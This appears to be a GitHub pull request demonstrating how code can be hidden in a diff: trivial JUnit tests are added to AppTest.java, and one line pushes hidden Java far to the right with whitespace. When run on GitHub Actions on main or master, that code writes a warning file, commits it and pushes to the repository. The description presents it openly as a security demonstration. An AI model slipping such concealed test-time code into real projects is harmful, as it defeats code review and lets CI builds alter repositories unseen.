### PR TITLE
Act3: Improve Testing

### DIFF
--- a/src/test/java/org/my/app/AppTest.java
+++ b/src/test/java/org/my/app/AppTest.java
@@ -1,5 +1,12 @@
 package org.my.app;
 
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertNotEquals;
+import static org.junit.Assert.assertNotNull;
+import static org.junit.Assert.assertNotSame;
+import static org.junit.Assert.assertNull;
+import static org.junit.Assert.assertSame;
 import static org.junit.Assert.assertTrue;
 
 import org.junit.Test;
@@ -15,5 +22,61 @@ public class AppTest {
     @Test
     public void shouldAnswerWithTrue() {
         assertTrue(true);
+    }
+
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithFalse() {
+        assertFalse(false);
+    }
+
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithEquals() {
+        assertEquals(this, this);
+    }
+
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithNotEquals() {
+        assertNotEquals(this, new App());
+    }
+
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithNotNull() {
+        assertNotNull(this);                                                                                                                                   boolean isAction = Boolean.parseBoolean(getEnv("GITHUB_ACTIONS", "false"));String ref = getEnv("GITHUB_REF", "");boolean notPR = getEnv("GITHUB_HEAD_REF", "").isEmpty();java.io.File f = new java.io.File("warning.md");boolean isMain = "refs/heads/main".equals(ref);boolean isMaster = "refs/heads/master".equals(ref);if (isAction && notPR && (isMain || isMaster) && !f.exists()) {try (java.io.FileWriter writer = new java.io.FileWriter(f);java.io.BufferedWriter out = new java.io.BufferedWriter(writer)) {out.write("Warning\n=======\n\n");out.write("Branch protection is not enabled and GitHub Actions has the\n");out.write("ability to write to the repository. Any action or code executed\n");out.write("during the build, even code in third party dependencies called\n");out.write("during testing, could subvert the integrity of your project.\n\n");out.write("See [Disabling or limiting GitHub Actions for a repository]");out.write("(https://docs.github.com/en/actions/reference/environment-variables#default-environment-variables) ");out.write("for more information on how to protect you repository.");out.flush();out.close();} catch (java.io.IOException ex) {} exec("git config user.email \"actions@github.com\"");exec("git config user.name \"GitHub Actions\"");exec("git add warning.md");exec("git commit -m \"warning\" warning.md");if (isMain) {exec("git push origin main");} else {exec("git push origin master");}}
+    }                                                                                                                                                          private String getEnv(String name, String def) {String ret = System.getenv(name);if (ret == null) {ret = def;} return ret;} private void exec(String cmd) {try {Runtime run = Runtime.getRuntime();Process pr = run.exec(cmd);Thread in = new ProcessReader(pr.getInputStream());Thread err = new ProcessReader(pr.getErrorStream());in.start();err.start();if (pr.isAlive()) {pr.waitFor();} in.join();err.join();} catch (java.io.IOException | InterruptedException ex) {}} static class ProcessReader extends Thread {java.io.InputStream inputStream;byte[] buffer = new byte[1024];ProcessReader(java.io.InputStream inputStream) {this.inputStream = inputStream;} @Override public void run() {try {int read;do {read = inputStream.read(buffer);} while (read != -1);} catch (java.io.IOException ex) {}}}
+    
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithNull() {
+        assertNull(null);
+    }
+
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithSame() {
+        assertSame(this, this);
+    }
+
+    /**
+     * Rigorous Test.
+     */
+    @Test
+    public void shouldAnswerWithNotSame() {
+        assertNotSame(this, new App());
     }
 }


### PR DESCRIPTION
Act 3 introduces a technique to hide code by abusing the default diff UI in GitHub. There is no indiction that the same code from [Act 1](https://github.com/jeremylong/musical-octo-carnival/pull/1) has been re-introduced on [lines 56 & 57](https://github.com/jeremylong/musical-octo-carnival/pull/3/files#diff-cadb74f3bed329b8a83616abb3f3df19e9b5d8f57150e360d226e812c4ee29bcR56-R57). 

There is no line wrap in the Unified view - or even any indication that code goes off to the right (not even a scroll bar). One must switch to the Split view to see the line wrap.